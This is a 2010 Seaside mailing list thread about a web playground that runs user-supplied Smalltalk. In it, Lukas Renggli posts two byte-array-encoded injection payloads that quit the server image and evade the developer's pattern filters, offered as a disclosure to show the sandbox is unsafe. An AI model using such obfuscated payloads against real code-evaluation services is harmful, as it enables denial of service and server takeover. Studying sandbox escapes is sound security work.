Seaside playground
Locked
12
12
 
|
I have made a seaside playground application for Seaside 3.0x.
To check it out just to load the package Seaside-Tests-Playground-obi.4.mcz MCHttpRepository Gerhard _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
|
|
Cool, thanks.
Cheers Philippe 2010/1/9 Gerhard Obermann <[hidden email]>: > I have made a seaside playground application for Seaside 3.0x. > > To check it out just to load the package > > Seaside-Tests-Playground-obi.4.mcz > > MCHttpRepository > location: 'http://www.squeaksource.com/Seaside30Addons' > user: 'obi' > password: '' > > Gerhard > > > > _______________________________________________ > seaside mailing list > [hidden email] > http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside > > seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
|
|
In reply to this post by Gerhard Obermann
Hi,
I have trien on Squeak Trunk , and got an error. Log is attached. regards, Vaidotas On Sat, Jan 9, 2010 at 10:44 AM, Gerhard Obermann <[hidden email]> wrote: > I have made a seaside playground application for Seaside 3.0x. > > To check it out just to load the package > > Seaside-Tests-Playground-obi.4.mcz > > MCHttpRepository > location: 'http://www.squeaksource.com/Seaside30Addons' > user: 'obi' > password: '' > > Gerhard > > > > _______________________________________________ > seaside mailing list > [hidden email] > http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside > > _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
SqueakDebug.log (5K) |
|
It's only tested with Pharo!
Gerhard 2010/1/9 Vaidotas Didžbalis <[hidden email]> Hi, _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
|
|
In reply to this post by vaidasd
It should work with Squeak too.
But you didn't load JQuery (It's a prerequisite)! Gerhard 2010/1/9 Vaidotas Didžbalis <[hidden email]> Hi, _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
|
|
What is this exactly? Some demos?
Lukas 2010/1/9 Gerhard Obermann <[hidden email]>: > It should work with Squeak too. > But you didn't load JQuery (It's a prerequisite)! > > Gerhard > > 2010/1/9 Vaidotas Didžbalis <[hidden email]> >> >> Hi, >> I have trien on Squeak Trunk , and got an error. Log is attached. >> regards, >> Vaidotas >> >> >> On Sat, Jan 9, 2010 at 10:44 AM, Gerhard Obermann <[hidden email]> >> wrote: >> > I have made a seaside playground application for Seaside 3.0x. >> > >> > To check it out just to load the package >> > >> > Seaside-Tests-Playground-obi.4.mcz >> > >> > MCHttpRepository >> > location: 'http://www.squeaksource.com/Seaside30Addons' >> > user: 'obi' >> > password: '' >> > >> > Gerhard >> > >> > >> > >> > _______________________________________________ >> > seaside mailing list >> > [hidden email] >> > http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside >> > >> > >> >> _______________________________________________ >> seaside mailing list >> [hidden email] >> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside >> > > > _______________________________________________ > seaside mailing list > [hidden email] > http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside > > -- Lukas Renggli http://www.lukas-renggli.ch _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
|
|
Its a playground for seaside 3.0x.
Just load the package for a demo! It automatically creates the render code for if you use the predefined tags or you can write the render code by yourself and you can check the results immediatly. Also the callbacks can be used and the results can be checked. Maybe it would be nice if we could put it on the demo seaside page. Gerhard On Sat, Jan 9, 2010 at 8:05 PM, Lukas Renggli <[hidden email]> wrote: What is this exactly? Some demos? _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
|
|
Screenshots please :)
2010/1/9 Gerhard Obermann <[hidden email]>: > Its a playground for seaside 3.0x. > Just load the package for a demo! > > It automatically creates the render code for if you use the predefined tags > or you can write the render code by yourself and you can check the results > immediatly. > Also the callbacks can be used and the results can be checked. > > Maybe it would be nice if we could put it on the demo seaside page. > > > Gerhard > > On Sat, Jan 9, 2010 at 8:05 PM, Lukas Renggli <[hidden email]> wrote: >> >> What is this exactly? Some demos? >> >> Lukas >> >> 2010/1/9 Gerhard Obermann <[hidden email]>: >> > It should work with Squeak too. >> > But you didn't load JQuery (It's a prerequisite)! >> > >> > Gerhard >> > >> > 2010/1/9 Vaidotas Didžbalis <[hidden email]> >> >> >> >> Hi, >> >> I have trien on Squeak Trunk , and got an error. Log is attached. >> >> regards, >> >> Vaidotas >> >> >> >> >> >> On Sat, Jan 9, 2010 at 10:44 AM, Gerhard Obermann <[hidden email]> >> >> wrote: >> >> > I have made a seaside playground application for Seaside 3.0x. >> >> > >> >> > To check it out just to load the package >> >> > >> >> > Seaside-Tests-Playground-obi.4.mcz >> >> > >> >> > MCHttpRepository >> >> > location: 'http://www.squeaksource.com/Seaside30Addons' >> >> > user: 'obi' >> >> > password: '' >> >> > >> >> > Gerhard >> >> > >> >> > >> >> > >> >> > _______________________________________________ >> >> > seaside mailing list >> >> > [hidden email] >> >> > http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside >> >> > >> >> > >> >> >> >> _______________________________________________ >> >> seaside mailing list >> >> [hidden email] >> >> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside >> >> >> > >> > >> > _______________________________________________ >> > seaside mailing list >> > [hidden email] >> > http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside >> > >> > >> >> >> >> -- >> Lukas Renggli >> http://www.lukas-renggli.ch >> _______________________________________________ >> seaside mailing list >> [hidden email] >> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside > > > _______________________________________________ > seaside mailing list > [hidden email] > http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside > > seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
|
|
Screenshot is attached! Gerhard _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
|
|
Mhh, that looks extremely cool. However you can basically kill the
image, take over the server, format the harddisk? Lukas 2010/1/10 Gerhard Obermann <[hidden email]>: > > Screenshot is attached! > > Gerhard > > _______________________________________________ > seaside mailing list > [hidden email] > http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside > > -- Lukas Renggli http://www.lukas-renggli.ch _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
|
|
This is cool indeed !
2010/1/10 Lukas Renggli <[hidden email]> Mhh, that looks extremely cool. However you can basically kill the yes I think this is the problem. For example, I tried an anchor, then put Object explore or self halt. Then, I save and both action are executed opening either the explorer or the debugger which is problematic.
Cheers,
-- Cédrick _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
|
|
The latest version doesn't allow simple hacks anymore.
Unfortunately its still possible to open a window in the image. It should not possible to kill the server or even execute shell commands. If anyone can still do some dangerous hacks, please let me know. Gerhard On Sun, Jan 10, 2010 at 7:30 PM, Cédrick Béler <[hidden email]> wrote: This is cool indeed ! _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
|
|
> The latest version doesn't allow simple hacks anymore.
It took me about 3 minutes to take over your computer and do whatever I want with it ;-) self class compile: #[115 117 114 112 114 105 115 101 32 34 73 110 32 101 118 101 114 121 98 111 100 121 32 104 97 110 100 115 33 34 32 83 109 97 108 108 116 97 108 107 73 109 97 103 101 32 99 117 114 114 101 110 116 32 115 110 97 112 115 104 111 116 58 32 102 97 108 115 101 32 97 110 100 81 117 105 116 58 32 116 114 117 101] asString. self surprise Lukas 2010/1/10 Gerhard Obermann <[hidden email]>: > The latest version doesn't allow simple hacks anymore. > Unfortunately its still possible to open a window in the image. > It should not possible to kill the server or even execute shell commands. > > If anyone can still do some dangerous hacks, please let me know. > > Gerhard > > On Sun, Jan 10, 2010 at 7:30 PM, Cédrick Béler <[hidden email]> wrote: >> >> This is cool indeed ! >> >> 2010/1/10 Lukas Renggli <[hidden email]> >>> >>> Mhh, that looks extremely cool. However you can basically kill the >>> image, take over the server, format the harddisk? >> >> yes I think this is the problem. >> For example, I tried an anchor, then put Object explore or self halt. >> Then, I save and both action are executed opening either the explorer or the >> debugger which is problematic. >> Cheers, >> >>> >>> Lukas >>> >>> 2010/1/10 Gerhard Obermann <[hidden email]>: >>> > >>> > Screenshot is attached! >>> > >>> > Gerhard >>> > >>> > _______________________________________________ >>> > seaside mailing list >>> > [hidden email] >>> > http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside >>> > >>> > >>> >>> >>> >>> -- >>> Lukas Renggli >>> http://www.lukas-renggli.ch >>> _______________________________________________ >>> seaside mailing list >>> [hidden email] >>> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside >> >> >> >> -- >> Cédrick >> >> _______________________________________________ >> seaside mailing list >> [hidden email] >> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside >> > > > _______________________________________________ > seaside mailing list > [hidden email] > http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside > > -- Lukas Renggli http://www.lukas-renggli.ch _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
|
|
fun :o)
2010/1/10 Lukas Renggli <[hidden email]>
It took me 1 minute to understand what you did :))
-- Cédrick _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
|
|
In reply to this post by Lukas Renggli
Thats not a simple hack.
And it doesn't really take over the computer. Anyway, such hacks are not possible anymore. Gerhard On Sun, Jan 10, 2010 at 10:08 PM, Lukas Renggli <[hidden email]> wrote:
_______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
|
|
> Thats not a simple hack.
> And it doesn't really take over the computer. Sure. As soon as I can execute arbitrary Smalltalk code on your machine, i can deploy a Trojan for your platform. > Anyway, such hacks are not possible anymore. There is an infinite number of other hacks. It gets harder over time, but the one below is particularly simple: html evaluateUnloggedForSelf: #[34 73 110 115 116 97 108 108 32 116 104 101 32 102 97 118 111 114 105 116 101 32 116 114 111 121 97 110 34 32 83 109 97 108 108 116 97 108 107 73 109 97 103 101 32 99 117 114 114 101 110 116 32 115 110 97 112 115 104 111 116 58 32 102 97 108 115 101 32 97 110 100 81 117 105 116 58 32 116 114 117 101] asString My point is that no matter how much time you spend on making it secure by checking for particular patterns or strings, there will always be ways to fool it. In the Smalltalk world security is inherently weak, mostly because of the strong reflective capabilities. I would really love to see you application on the web, but in its current form we won't be able to run it on seaside.st. Lukas -- Lukas Renggli http://www.lukas-renggli.ch _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
|
|
Are there any options to make it really secure?
Gerhard On Mon, Jan 11, 2010 at 10:13 AM, Lukas Renggli <[hidden email]> wrote:
_______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
|
|
2010/1/11 Gerhard Obermann <[hidden email]> Are there any options to make it really secure? The best option is probably to serve it independantly of seaside.st and include it in seaside.st.
Also, you should catch undeclared variables: I just tried the following expression that open a debugger as the variable is not declared html anchor callback: [anAction]; with: 'Click me'.
Cheers Gerhard -- Cédrick _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
|
|
In reply to this post by Gerhard Obermann
2010/1/11 Gerhard Obermann <[hidden email]> -- Are there any options to make it really secure?
maybe not allowing string of more than say 20 characters is a first step. Of course, string concatenation must be controlled too... Forbidding ByteArray use is also a good point I guess
... hth Cédrick _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
|
|
In reply to this post by Gerhard Obermann
Very interesting!
Thanks! 2010/1/10 Gerhard Obermann <[hidden email]>: > > Screenshot is attached! > > Gerhard > > _______________________________________________ > seaside mailing list > [hidden email] > http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside > > seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
«
Return to Seaside General
|
1 view|%1 views
| Free forum by Nabble | Edit this page |